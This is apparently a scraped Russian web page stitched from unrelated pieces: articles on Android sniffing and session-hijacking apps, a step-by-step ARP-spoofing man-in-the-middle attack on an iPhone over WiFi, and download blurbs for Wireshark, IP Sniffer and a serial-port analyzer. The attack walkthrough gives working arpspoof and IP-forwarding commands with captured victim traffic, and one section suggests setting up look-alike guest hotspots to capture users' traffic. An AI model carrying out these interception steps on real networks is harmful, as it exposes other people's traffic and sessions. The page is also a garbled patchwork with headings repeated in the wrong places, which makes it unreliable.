Сниффинг wifi трафика

В прошлый раз мы рассмотрели сканеры уязвимостей, используемые в смартфонах. В этой статье мы поговорим о других способах проникновения в сеть: Wi-Fi сниффинг, перехват сессии (hijacking) и ARP-спуфинг.

Автор: Кен Вестин (KenWestin)

В прошлый раз мы рассмотрели сканеры уязвимостей, используемые в смартфонах. В этой статье мы поговорим о других способах проникновения в сеть: Wi-Fi сниффинг, перехват сессии (hijacking) и ARP-спуфинг.

Предупреждение: Эта статья представлена только в ознакомительных целях. Используемые методы могут вывести из строя сеть и мобильные устройства. Все программы следует использовать только для исследования своих собственных сетей. Приложения не следует устанавливать на чужие устройства или использовать в злонамеренных целях.

Перехват сессии и arp-спуфинг

Возможно, вы знакомы с утилитой FireSheep. Этот плагин для браузера Firefox позволяет перехватывать сессии таких популярных сайтов, как Facebook и Twitter. После появления плагина вышеперечисленные сайты реализовали полное шифрование данных, а не только при проверке логина и пароля. Для смартфонов с ОС Андроид существует похожее приложение DroidSheep, которое требует root-доступ на мобильном телефоне (см. первую часть статьи). DroidSheep может работать в нескольких режимах, и когда оно подключено к сети, то использует ARP-спуфинг для перехвата сессий.

Внимание! В некоторых случаях приложение может быть обнаружено и замедлить всю сеть. Такое происходило несколько раз во время моих экспериментов. Для сокрытия работы DroidSheep нужно отключить функцию arp-спуфинга, хотя это не имеет особого смысла, поскольку в этом случае в зашифрованных сетях никаких данных собрано не будет.

В режиме “Generic mode” DroidSheep собирает данные сессий всех возможных сервисов, а не только с сайтов Twitter или Facebook. В моем случае удалось перехватить данные с учетных записей WordPress, Facebook, Twitter and Trimet.org.

Более изощренный способ перехвата используется в приложении Network Spoofer, которое позволяет изменять передаваемый трафик. При первом запуске приложение качает огромный файл размером 600 МБ, являющийся образом Debian-дистрибутива, который содержит прокси-сервер Squid и другие инструменты для изменения картинок и выполнения других задач. К примеру, Network Spoofer позволяет перенаправлять трафик на определенный сайт, изменять параметры картинок и модифицировать поисковые запросы.

Network Spoofer лучше всего работает в незащищенной сети (open network), хотя в сетях защищенных при помощи WPA/WPA2 также может перехватывать данные, но при этом возможно замедление или выход из строя сети. Приложение совместимо с большинством смартфонов (хотя и не со всеми). Я проводил тестирование на Nexus One и Galaxy S, все прошло успешно.

Wi-Fi сниффинг

Network Spoofer также позволяет перенаправлять весь трафик сети через смартфон, а затем эти данные могут быть записаны при помощи сниффера. Одно из лучших приложений для решения этой задачи — Shark for root (если не считать надоедливой рекламы). В связке с arp-спуфингом проблема остается той же: вполне вероятно замедление или выход из строя сети.

Более предпочтительный способ сниффинга трафика – создание на смартфоне хот-спота Wi-Fi. Смартфоны с root-доступом позволяют создавать ad-hoc хот-спот. Создав открытый хот-спот, имя которого схоже с именем офисного хот-спота или же просто хот-спот с гостевой учетной записью (к примеру «Acme-Guest»), вы сможете перехватывать трафик пользователей, подключившихся к вашему телефону.

Как упоминалось выше, одной из лучших программ для сниффинга трафика является Shark for root, которая записывает весь трафик в pcap-файл на SD-карту вашего телефона. Для чтения таких файлов используется приложение Shark Reader, хотя вы также можете скопировать лог к себе на компьютер и просмотреть при помощи программы Wireshark или более функциональных приложений.

Надеюсь, эта статья оказалась полезной, и вы узнали о новых способах проникновения в сеть при помощи смартфонов. В следующий раз мы поговорим об удаленном выполнении скриптов (remote scripting).

Приложение для анализа сетевого трафика, программа Wireshark 2.4.1 – сетевая утилита с хорошим функционалом. Программа распространяется согласно свободной лицензии GNU GPL и, на сегодняшний день, является одним из самых известных снифферов, для сети Ethernet.

Коротко о Wireshark.

Работа Wireshark базируется на функциях библиотеки pcap (Packet Capture) – происходит захват пакетов в локальной сети, с последующим их анализом. Приложение имеет графический интерфейс (русского языка нет), и весьма популярно у сетевых администраторов, разработчиков сетевых программ и простых пользователей. Кратко, возможности программы можно описать так:
— Перехват сетевого трафика.
— Декодирование перехваченных пакетов.
— Фильтрация пакетов.
— Запись дампа.
— Обработка записанных ранее файлов.

Программа никоим образом не генерирует сетевой трафик и не обнаруживает себя в сети.

Инсталляция Wireshark.

В операционную систему Windows приложение инсталлируется легко, без каких-либо сложностей. Кроме того, разработчиками выпускаются версии для FreeBSD, различных версий Linux и MacOS. Во время инсталляции, кроме анализатора вместе с графической оболочкой, можно дополнительно установить следующие утилиты:
— Фильтр «сырых» пакетов Rawshark.
— Программа для работы с сохраненными дампами Editcap.
— Конвертер Text2pcap.
— Консольный анализатор Tshark.

Особенности анализа

В базе данных Wireshark содержится информация о структуре различных сетевых пакетов, их количество гораздо больше, чем то, что можно «захватить» с помощью pcap. Поэтому, программу стоит скачать не только для мониторинга локальных сетей, но и для анализа редко встречающихся протоколов – например, LTE VoIP и других. Непосредственно «прослушать» такой трафик Wireshark не сможет, но открыть сохраненный в другом приложении дамп – легко!

В числе функций программы есть и фильтрация пакетов.

Сниффинг HTTPS трафика в Wi-Fi и локальных сетях.

При этом нужно понимать, что фильтры могут работать на этапе «прослушивания» сети – Capture filter, и на этапе анализа полученного дампа – Display filter. Это два разных режима работы. В первом случае, при неправильных установках фильтра, возможна потеря информации – приложение просто «не запишет» те пакеты, которые не удовлетворяют условиям фильтра. Во втором случае программа запишет все, но «покажет» только то, что «пройдет» через фильтр.

Технические характеристики:

Версия: Wireshark 2.4.1
Язык: английский
Статус: Бесплатно
Автор: Wireshark Foundation
Система: Windows All

 

Скачать Wireshark x86 с официального сайта

Скачать Wireshark x64 с официального сайта

Комментарии для Wireshark 2.4.1 скачать сетевой сниффер

.

Вчера @akaDimiG сбросил мне небольшую заметку «Безопасность Wi-Fi в iPhone под сомнением», которая с первого взгляда у меня вызвала большое сомнение.

4 ноября компания SMobile Global Threat Center опубликовала исследование об атаке MITM (Man-in-the-middle) на смартфоны (и iPhone в том числе), подключающиеся в Интернет через публичные точки доступа WiFi. Ничего нового это исследование не открыло — эти техники известны давно, однако оно обратило внимание на технику обхода шифрации SSL (SSL Bypass). Статья доступна в виде PDF на сайте компании. Уязвимость SSL была продемонстрирована на конференции Black Hat в феврале 2009. Детальное описание можно посмотреть в презентации Moxie Marlinspike (PDF) «New Tricks For Defeating SSL In Practice».

Но, поддавшись первому порыву, посмотрите внимательно на этот доклад. Чтобы атака сработала, клиент должен установить соединение по http (gmail.com), исследователь перехватывает ссылку, на которую переправляет (https://gmail.com) и сам общается с gmail по https, транслируя все данные форм, возвращая «жертве» данные по http. Но если «жертва» пойдёт прямо на «https://gmail.com», то никакой MITM/SSL Bypass не расшифрует этот трафик. И только закон больших чисел даёт из сотен человек найти одну «жертву». Исследование — это отличный PR, рассчитанный на обычных людей. Посмотрите на десяток перепечаток новости — в каждой сквозит беспочвенная паника.

Поэтому вместо гипотетического «SSL Bypass» давайте рассмотрим, как провести атаку Man In The Middle.

Man in the middle

Я проходился по нерадивым администраторам, для облегчения себе жизни или из простого незнания не уделяющим внимания потенциальным дырам в безопасности. Атаку MITM можно сделать невозможной, включив на точке доступа функцию «AP Isolation», тогда клиенты в сети не смогут взаимодействовать напрямую.

По крайней мере в точках LinkSys я такую функцию находил.

Раньше я думал, что MITM осуществить непросто, и на неё можно не обращать внимание. Как я ошибался…

Итак, приступим. Нам понадобится ноутбук (тематика блога подразумевает ноутбук Apple, но подойдёт любой Unix).

MITM заключается в том, чтобы заставить клиента думать, что трафик нужно просылать не через законный маршрутизатор, а через компьютер атакующего, путём внедрения фальшивого ARP. Для этого нужна утилита arpspoof. Она входит в пакет dsniff.

Обновляем порты:

$ sudo port selfupdate $ port search dsniff dsniff @2.3 (net) network auditing and penetration testing tools dsniff-devel @2.4b1 (net) network auditing and penetration testing tools

К сожалению, у меня не поставлся обычный dsniff из-за проблем компиляции с libnet, поэтому использовал dsniff-devel, ставящий библиотеки X11.

$ sudo port install dsniff-devel

Теперь нужно определить адрес «жертвы».

Он определяется по броадкаст- и мультикаст-запросам, которые устройство посылает после входа в сеть. Это делаем утилитой tshark из пакета Wireshark.

В качестве жертвы я использовал iPhone, подключающийся в WiFi-сеть, в которой уже зарегистрирован «исследователь». Для простоты убираем из захвата tshark пакеты исследователя (192.168.99.10):

$ sudo tshark -i en1 not host 192.168.99.10 86.799891 0.0.0.0 -> 255.255.255.255 DHCP DHCP Request — Transaction ID 0x702c1385 86.799930 Apple_43:7e:5b -> Broadcast ARP Gratuitous ARP for 192.168.99.12 (Request) 87.208880 Apple_43:7e:5b -> Broadcast ARP Who has 169.254.255.255? Tell 192.168.99.12 87.329216 192.168.99.12 -> 224.0.0.2 IGMP V2 Leave Group 224.0.0.251 87.336388 192.168.99.12 -> 224.0.0.251 IGMP V2 Membership Report / Join group 224.0.0.251 87.535037 Apple_43:7e:5b -> Broadcast ARP Who has 169.254.255.255? Tell 192.168.99.12 87.633880 Apple_43:7e:5b -> Broadcast ARP Who has 192.168.99.1? Tell 192.168.99.12 87.635113 192.168.99.12 -> 224.0.0.251 MDNS Standard query ANY ole-iphone.local, «QU» question 87.790738 Apple_43:7e:5b -> Broadcast ARP Who has 192.168.99.1? Tell 192.168.99.12 87.885778 192.168.99.12 -> 224.0.0.251 MDNS Standard query ANY ole-iphone.local, «QM» question 87.935788 Apple_43:7e:5b -> Broadcast ARP Who has 169.254.255.255?

Перехват трафика устройств, подключённых через публичную точку доступа WiFi (атака MITM)

Tell 192.168.99.12 88.135397 192.168.99.12 -> 224.0.0.251 MDNS Standard query ANY ole-iphone.local, «QM» question 88.336400 Apple_43:7e:5b -> Broadcast ARP Who has 169.254.255.255? Tell 192.168.99.12 88.385319 192.168.99.12 -> 224.0.0.251 MDNS Standard query response A, cache flush 192.168.99.12 PTR, cache flush ole-iphone.local 89.461989 192.168.99.12 -> 224.0.0.251 MDNS Standard query response A, cache flush 192.168.99.12 PTR, cache flush ole-iphone.local 91.407420 192.168.99.12 -> 224.0.0.251 MDNS Standard query response A, cache flush 192.168.99.12 PTR, cache flush ole-iphone.local 92.226848 192.168.99.12 -> 239.255.255.250 SSDP M-SEARCH * HTTP/1.1 92.227119 192.168.99.12 -> 239.255.255.250 SSDP M-SEARCH * HTTP/1.1 93.660303 192.168.99.12 -> 239.255.255.250 SSDP M-SEARCH * HTTP/1.1 93.660615 192.168.99.12 -> 239.255.255.250 SSDP M-SEARCH * HTTP/1.1 94.457022 192.168.99.12 -> 224.0.0.251 IGMP V2 Membership Report / Join group 224.0.0.251 95.401260 192.168.99.12 -> 224.0.0.251 MDNS Standard query response A, cache flush 192.168.99.12 PTR, cache flush ole-iphone.local

Жертва определена, она получила адрес 192.168.99.12. Необходимо пропустить трафик жертвы через ноутбук, для чего включаем ip forwarding:

$ sysctl net.inet.ip.forwarding net.inet.ip.forwarding: 0 $ sudo sysctl -w net.inet.ip.forwarding=1

Запускаем инъекцию ложных arp, чтобы «жертве» в ответ на запрос mac маршрутизатора выдался mac «исследователя»:

$ sudo arpspoof -i en1 -t 192.168.99.12 192.168.99.1 0:26:8:e2:a6:c 4:1e:64:43:7e:5b 0806 42: arp reply 192.168.99.1 is-at 0:26:8:e2:a6:c 0:26:8:e2:a6:c 4:1e:64:43:7e:5b 0806 42: arp reply 192.168.99.1 is-at 0:26:8:e2:a6:c 0:26:8:e2:a6:c 4:1e:64:43:7e:5b 0806 42: arp reply 192.168.99.1 is-at 0:26:8:e2:a6:c 0:26:8:e2:a6:c 4:1e:64:43:7e:5b 0806 42: arp reply 192.168.99.1 is-at 0:26:8:e2:a6:c

  • -i en1 — AirPort
  • -t 192.168.99.12 — адрес жертвы, ложный mac будет сообщаться в ответ на запросы с этого адреса
  • 192.168.99.1 — адрес маршрутизатора, фальшивый mac будет сообщаться в ответ на запросы этого адреса

00:26:08:e2:a6:0c — это mac ноутбука исследователя:

$ ifconfig en1 en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 192.168.99.10 netmask 0xffffff00 broadcast 192.168.99.255 ether 00:26:08:e2:a6:0c

Вот, собственно, и всё, теперь трафик «жертвы» проходит через ноутбук исследователя:

$ sudo tshark -i en1 host 192.168.99.12 Capturing on en1 0.000000 Apple_e2:a6:0c -> Apple_43:7e:5b ARP 192.168.99.1 is at 00:26:08:e2:a6:0c 9.279215 192.168.99.12 -> 192.168.99.1 DNS Standard query A www.mysql.com 9.279237 192.168.99.12 -> 192.168.99.1 DNS Standard query A www.mysql.com 9.279270 192.168.99.10 -> 192.168.99.12 ICMP Redirect (Redirect for host) 9.291862 192.168.99.12 -> 213.136.52.29 TCP 49718 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276460 TSER=0 9.291932 192.168.99.12 -> 213.136.52.29 TCP 49718 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276460 TSER=0 9.429857 192.168.99.12 -> 74.125.43.109 TCP 49485 > imaps [ACK] Seq=317 Ack=632 Win=32952 Len=0 TSV=840276461 TSER=2003984811 9.429898 192.168.99.12 -> 74.125.43.109 TCP [TCP Dup ACK 48#1] 49485 > imaps [ACK] Seq=317 Ack=632 Win=32952 Len=0 TSV=840276461 TSER=2003984811 9.430490 192.168.99.12 -> 213.136.52.29 TCP 49718 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840276461 TSER=1590046881 9.430498 192.168.99.12 -> 213.136.52.29 TCP [TCP Dup ACK 50#1] 49718 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840276461 TSER=1590046881 9.439025 192.168.99.12 -> 213.136.52.29 HTTP GET /news-and-events/web-seminars/display-467.html HTTP/1.1 9.439079 192.168.99.12 -> 213.136.52.29 HTTP [TCP Out-Of-Order] GET /news-and-events/web-seminars/display-467.html HTTP/1.1 9.637697 192.168.99.12 -> 213.136.52.29 TCP 49718 > http [ACK] Seq=421 Ack=2897 Win=130320 Len=0 TSV=840276463 TSER=1590046948 9.637759 192.168.99.12 -> 213.136.52.29 TCP [TCP Dup ACK 54#1] 49718 > http [ACK] Seq=421 Ack=2897 Win=130320 Len=0 TSV=840276463 TSER=1590046948 9.638451 192.168.99.12 -> 213.136.52.29 TCP 49718 > http [ACK] Seq=421 Ack=4740 Win=128476 Len=0 TSV=840276463 TSER=1590046948 9.638503 192.168.99.12 -> 213.136.52.29 TCP [TCP Dup ACK 56#1] 49718 > http [ACK] Seq=421 Ack=4740 Win=128476 Len=0 TSV=840276463 TSER=1590046948 9.649155 192.168.99.12 -> 213.136.52.29 TCP 49718 > http [FIN, ACK] Seq=421 Ack=4740 Win=131768 Len=0 TSV=840276464 TSER=1590046948 9.649211 192.168.99.12 -> 213.136.52.29 TCP 49718 > http [FIN, ACK] Seq=421 Ack=4740 Win=131768 Len=0 TSV=840276464 TSER=1590046948 9.702673 192.168.99.12 -> 213.136.52.29 TCP 49719 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276464 TSER=0 9.702728 192.168.99.12 -> 213.136.52.29 TCP 49719 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276464 TSER=0 9.719934 192.168.99.12 -> 213.136.52.29 TCP 49720 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276464 TSER=0 9.719989 192.168.99.12 -> 213.136.52.29 TCP 49720 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276464 TSER=0 9.727094 192.168.99.12 -> 213.136.52.29 TCP 49721 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276464 TSER=0 9.727138 192.168.99.12 -> 213.136.52.29 TCP 49721 > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=2 TSV=840276464 TSER=0 9.841247 192.168.99.12 -> 213.136.52.29 TCP 49719 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840276465 TSER=1614517568 9.841309 192.168.99.12 -> 213.136.52.29 TCP [TCP Dup ACK 66#1] 49719 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840276465 TSER=1614517568 9.841400 192.168.99.12 -> 213.136.52.29 TCP 49720 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840276465 TSER=1614517572 9.841428 192.168.99.12 -> 213.136.52.29 TCP [TCP Dup ACK 68#1] 49720 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840
276465 TSER=1614517572 9.845311 192.168.99.12 -> 213.136.52.29 TCP 49721 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840276465 TSER=1614517573 9.845379 192.168.99.12 -> 213.136.52.29 TCP [TCP Dup ACK 70#1] 49721 > http [ACK] Seq=1 Ack=1 Win=131768 Len=0 TSV=840276465 TSER=1614517573 9.845543 192.168.99.12 -> 213.136.52.29 HTTP GET /common/js/clear_search_text.js HTTP/1.1 9.845593 192.168.99.12 -> 213.136.52.29 HTTP [TCP Out-Of-Order] GET /common/js/clear_search_text.js HTTP/1.1 9.845986 192.168.99.12 -> 213.136.52.29 HTTP GET /common/css/print.css HTTP/1.1 9.846023 192.168.99.12 -> 213.136.52.29 HTTP [TCP Out-Of-Order] GET /common/css/print.css HTTP/1.1 9.848917 192.168.99.12 -> 213.136.52.29 HTTP GET /common/css/mysql.css HTTP/1.1 9.848971 192.168.99.12 -> 213.136.52.29 HTTP [TCP Out-Of-Order] GET /common/css/mysql.css HTTP/1.1

К счастью, обмен с MobileMe и GMail ведётся по HTTPS/IMAPS:

$ sudo tshark -i en1 host 192.168.99.12 Capturing on en1 0.000000 Apple_e2:a6:0c -> Apple_43:7e:5b ARP 192.168.99.1 is at 00:26:08:e2:a6:0c 2.000779 Apple_e2:a6:0c -> Apple_43:7e:5b ARP 192.168.99.1 is at 00:26:08:e2:a6:0c 4.001618 Apple_e2:a6:0c -> Apple_43:7e:5b ARP 192.168.99.1 is at 00:26:08:e2:a6:0c 4.837984 192.168.99.12 -> 17.148.16.43 TLSv1 Application Data 4.838017 192.168.99.12 -> 17.148.16.43 TLSv1 [TCP Out-Of-Order] Application Data 4.838547 192.168.99.12 -> 74.125.43.109 TLSv1 Application Data 4.838561 192.168.99.12 -> 74.125.43.109 TLSv1 [TCP Out-Of-Order] Application Data 4.941498 192.168.99.12 -> 74.125.43.109 TCP 49485 > imaps [ACK] Seq=39 Ack=257 Win=32904 Len=0 TSV=840277595 TSER=2004098461 4.941578 192.168.99.12 -> 74.125.43.109 TCP [TCP Dup ACK 8#1] 49485 > imaps [ACK] Seq=39 Ack=257 Win=32904 Len=0 TSV=840277595 TSER=2004098461 4.945409 192.168.99.12 -> 74.125.43.109 TLSv1 Application Data 4.945452 192.168.99.12 -> 74.125.43.109 TLSv1 [TCP Out-Of-Order] Application Data 5.044213 192.168.99.12 -> 74.125.43.109 TCP 49485 > imaps [ACK] Seq=69 Ack=293 Win=32959 Len=0 TSV=840277596 TSER=2004098546 5.044263 192.168.99.12 -> 74.125.43.109 TCP [TCP Dup ACK 12#1] 49485 > imaps [ACK] Seq=69 Ack=293 Win=32959 Len=0 TSV=840277596 TSER=2004098546 5.098574 192.168.99.12 -> 74.125.43.109 TLSv1 Application Data 5.098645 192.168.99.12 -> 74.125.43.109 TLSv1 [TCP Out-Of-Order] Application Data 5.103338 192.168.99.12 -> 17.148.16.43 TCP 49585 > imaps [ACK] Seq=39 Ack=332 Win=32859 Len=0 TSV=840277597 TSER=2076082298 5.103411 192.168.99.12 -> 17.148.16.43 TCP [TCP Dup ACK 16#1] 49585 > imaps [ACK] Seq=39 Ack=332 Win=32859 Len=0 TSV=840277597 TSER=2076082298 5.109752 192.168.99.12 -> 17.148.16.43 TLSv1 Application Data 5.109792 192.168.99.12 -> 17.148.16.43 TLSv1 [TCP Out-Of-Order] Application Data 5.114479 192.168.99.12 -> 195.47.212.25 SSL Client Hello

Как вы видите, MITM реализуется очень просто.

Поэтому не рекомендую работать с важными данными и входить на критические сайты через публичные точки WiFi. Лучше использовать мобильный Интернет, здесь перехватить трафик любому желающему, сидящему за соседним столиком, нереально. Или же использовать VPN. А проще всего всегда контролировать, что используется именно SSL и данные не идут через незашифрованные http, pop3 и imap.

Юристы спорят о сниффинге трафика открытых WiFi

IP Sniffer 1.99.3.1

IP Sniffer 1.99.3.1 представляет собой удобный и качественный сниффер сети. Приложение IP Sniffer позволяет получать подробную информацию, которая касается всех проходящих по заданному протоколу пакетов. Также приложение обладает возможностью фильтровать обрабатываемые данные и декодировать содержимого просматриваемых пакетов. Кроме того, приложение может осуществлять сканирование определенного хоста или же всей подсети для поиска открытых портов.

Возможности IP Sniffer:

  • возможность использовать ARP для просмотра и удаления записей, а также отправки ответа;
  • возможность получения для заданного IP адреса Netbios имени;
  • возможность отобразить сетевые подключения и принудительно завершить выбранные;
  • возможность осуществления поиска DHCP серверов;
  • возможность использование службы WhoIs;
  • возможность преобразования IP в Hostname или проведение обратного преобразования;
  • возможность проведения PING для хостов или подсети.

Преимущества:

  • возможность получить подробную информации о сетевом адаптере;
  • возможность проводить монитор трафика;
  • возможность отображать диаграммы наиболее часто используемых IP адресов или протоколов;
  • возможность сканирования определенного хоста или же всей подсети для поиска открытых портов.

Смотрите также программы:
LanSafety
Pestretsov Font Viewer Jx
LanSpector
CommView for WiFi
IP-Tools

Официальный источник
Для ОС Windows Vista, XP
Размер дистрибутива 7,41 Мб
Язык интерфейса Английский
Программа Бесплатная
Обновлено 2012/12/01
Последняя версия 1.99.3.1

Free Serial Analyzer Overview

Free Serial Analyzer is a non-intrusive Serial Port sniffer and software RS-232/RS-422/RS-485 protocol analyzer for Windows.

Using this freeware RS232/RS485/RS422 logic analyzer utility you’ll be able to capture and display any data transmitted via Serial Ports of your computer. Captured raw binary data of serial communication packets is decoded, parsed and then represented in easy-readable format, allowing you to perform effective forensic analysis of any data exchanged via RS 232, RS 422 or RS 485 serial interfaces.

This free serial protocol analyzer is a complete software serial port sniffing solution, therefore you don’t need to worry about any additional hardware, null-modem cable, DB-25 or DE-9 connectors and so on.

Using this software Serial Port logic analyzer you’ll also be able to capture and monitor dataflow from any serial devices connected to the COM ports of the remote PC.

In order to monitor and analyze data streams flowing though remote Serial Ports you just need a Device Monitoring Studio Server and LAN or Internet connection to the remote computer.

Free Serial Analyzer supports advanced data filtering by Requests and I/O Codes.

Use this Serial Port Packet Sniffer for development, testing and debugging of your serial applications and devices.

How Free Serial Analyzer Works

Program installs filter driver over the Windows serial port driver and then monitors all the data transmitted via serial ports by any serial software application or RS-232/RS-422/RS-485 hardware devices.

This Free rs232 data explorer and tracer is designed for effective capturing, parsing and decoding, monitoring and analyzing of communication traffic generated by serial devices connected to the local or remote PC.

Capturing, parsing and displaying of data transferred via Serial Port connections now made easy!

Free Serial Analyzer OS support:

Free Serial Port Analyzer supports all modern Windows server and desktop platforms starting from Windows XP (32-bit and 64-bit) and including Windows 8/8.1 x86 and x64 operating systems.

Features

Free Serial Analyzer Features

Free Serial Port Analyzer is able to capture and decode monitored packets in real-time even under high traffic load. This Freeware Serial Port Monitor supports all standard Bit rates of 75, 110, 300, 1200, 2400, 4800, 9600, 19200, 38400, 57600 and 115200 bit/s. It is also extremely optimized and carefully tuned to support high transfer data rates and Non-standard bit rates without chance to slow down or stuck your computer or operating system like many others do. Our Free COM Port Analyzer also supports all standard Data bits, Parity (odd, even, mark, space), Stop bits, XON/XOFF Software and Hardware Flow control.

  • It intercepts and traces all Input/Output Control Code Requests (IOCTLs) and I/O Request Packets (IRPs) from DTE (data terminal equipment) and DCE (data circuit-terminating equipment) devices.
  • It displays the status of Serial (Modem) control lines: Transmitted Data TxD, Received Data RxD, Data Terminal Ready DTR, Carrier Detect DCD, Data Set Ready DSR, Ring Indicator RI, Request To Send RTS, Clear To Send CTS.
  • It monitors data from plug and play (PnP) serial ports and I/O ports (COM Ports) interfaced by 16550 UART: COM1, COM2, COM3, COM4 … COMn; custom and virtual serial ports registered and visible in Windows device manager under standard Ports (COM & LPT) device class.
  • It may capture serial port traffic which flows via named pipes created by our Free Virtual Serial Ports.
  • It supports monitoring of exchanged serial data from external devices connected to the PC via USB to Serial converters.

If you are looking for complete software solution to view serial port communication traffic and explore serial protocol packets data, Free Serial Analyzer is what you need. This serial port monitoring tool requires no additional hardware and allows you to debug protocol errors, view and test device failures.

Usage Scenarios

Our Free Serial Port Monitor Usage Scenarios

You can use this Serial Port communications viewer and debugger for:

  • Serial protocol development, system integration and diagnostics
  • Detecting errors in asynchronous data transmission
  • Analyzing of data transferred between any RS232/422/485 device and Windows application
  • Development of RS232, RS485 and RS422 peripheral devices and device drivers
  • Debugging any serial port software or hardware
  • Researching functionality of any third-party hardware devices and software applications
  • Debugging and testing different MODBUS devices
  • Testing and troubleshooting serial protocols between device and device driver
  • Analyzing and reverse-engineering RS-232/RS-422/RS-485 serial protocols

Target Groups

Free Software Serial Port Logic Analyzer Target Groups

Our free serial data parser, decoder and analyser is an extremely useful tool for the following target groups:

  • Serial port device drivers and software application developers
  • RS232/422/485 hardware developers, manufacturers and vendors
  • System integrators and consultants
  • Field and lab engineers
  • Programmers, testers and other IT specialists
  • SCADA software system engineers
  • Industrial control equipment support specialists
  • Science technicians and university students

Supported Serial Devices

Free Serial Protocol Analyzer allows you to capture communication data flowing between computer and the following serial devices:

  • Dial-up Modems, Fax-Modems, mini-ATS, Computer terminals, teletypes
  • POS terminals, shop till systems, Bar code scanners and other point of sale devices
  • Industrial automation systems, RS232/485/422 industrial equipment
  • Network equipment, Wireless LAN equipment, Serial device servers, NPort servers
  • Console ports, Routers, Multiplexers, Hubs, Switches, firewalls, load balancers
  • RS-232 to RS-422/485 converters, Multiport Serial Boards, Serial to fiber converters
  • Printers, test instruments, scientific instruments, relays, lamps, Telescopes
  • Test and measuring equipment, multimeters, oscilloscopes, manometers, sensors
  • Network-enable serial devices, Serial device controllers, uninterruptible power supply
  • Low-speed satellite modems, satellite phones, GPS receivers, other satellite based transceiver devices
  • PLCs, VFDs, servo drives, CNC controllers, other CNC equipment programmable via RS232/422/485
  • Entertaining equipment, simulators, MIDI-serial devices
  • HVAC, door entry systems, other security systems
  • Bar-code readers, Cash registers, Card readers
  • Diagnostic equipment, software debuggers that run on a second computer

Supported Serial Requests

List of supported Serial Major I/O Requests:

  • IRP_MJ_WRITE
  • IRP_MJ_READ
  • IRP_MJ_POWER
  • IRP_MJ_PNP
  • IRP_MJ_INTERNAL_DEVICE_CONTROL
  • IRP_MJ_DEVICE_CONTROL
  • IRP_MJ_CREATE
  • IRP_MJ_CLOSE

List of supported Serial Device Control Requests:

  • IOCTL_SERIAL_XOFF_COUNTER
  • IOCTL_SERIAL_WAIT_ON_MASK
  • IOCTL_SERIAL_SET_XOFF
  • IOCTL_SERIAL_SET_XON
  • IOCTL_SERIAL_SET_WAIT_MASK
  • IOCTL_SERIAL_SET_TIMEOUTS
  • IOCTL_SERIAL_SET_RTS
  • IOCTL_SERIAL_SET_QUEUE_SIZE
  • IOCTL_SERIAL_SET_LINE_CONTROL
  • IOCTL_SERIAL_SET_HANDFLOW
  • IOCTL_SERIAL_SET_DTR
  • IOCTL_SERIAL_SET_CHARS
  • IOCTL_SERIAL_SET_BREAK_ON
  • IOCTL_SERIAL_SET_BREAK_OFF
  • IOCTL_SERIAL_SET_BAUD_RATE
  • IOCTL_SERIAL_RESET_DEVICE
  • IOCTL_SERIAL_PURGE
  • IOCTL_SERIAL_LSRMST_INSERT
  • IOCTL_SERIAL_IMMEDIATE_CHAR
  • IOCTL_SERIAL_GET_WAIT_MASK
  • IOCTL_SERIAL_GET_TIMEOUTS
  • IOCTL_SERIAL_GET_STATS
  • IOCTL_SERIAL_GET_PROPERTIES
  • IOCTL_SERIAL_GET_MODEMSTATUS
  • IOCTL_SERIAL_GET_LINE_CONTROL
  • IOCTL_SERIAL_GET_HANDFLOW
  • IOCTL_SERIAL_GET_DTRRTS
  • IOCTL_SERIAL_GET_COMMSTATUS
  • IOCTL_SERIAL_GET_CHARS
  • IOCTL_SERIAL_GET_BAUD_RATE
  • IOCTL_SERIAL_CONFIG_SIZE
  • IOCTL_SERIAL_CLR_RTS
  • IOCTL_SERIAL_CLR_DTR
  • IOCTL_SERIAL_CLEAR_STATS

Download this Free Serial Port Monitor and start to analyze Serial Port communications in just few seconds!

Free Serial Analyzer Advantages

  1. Fast. It works on high transfer rates without affecting PC performance.
  2. Flexible.

    Перехват трафика устройств, подключённых через публичную точку доступа WiFi (атака MITM)

    It supports advanced data filtering and layout customization.

  3. Remote. It monitors devices connected to the remote computer.
  4. Social. It allows you t
    o ask questions and get answers from experts.
  5. FREE. It costs you NOTHING!

Learn Free Serial Analyzer features

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *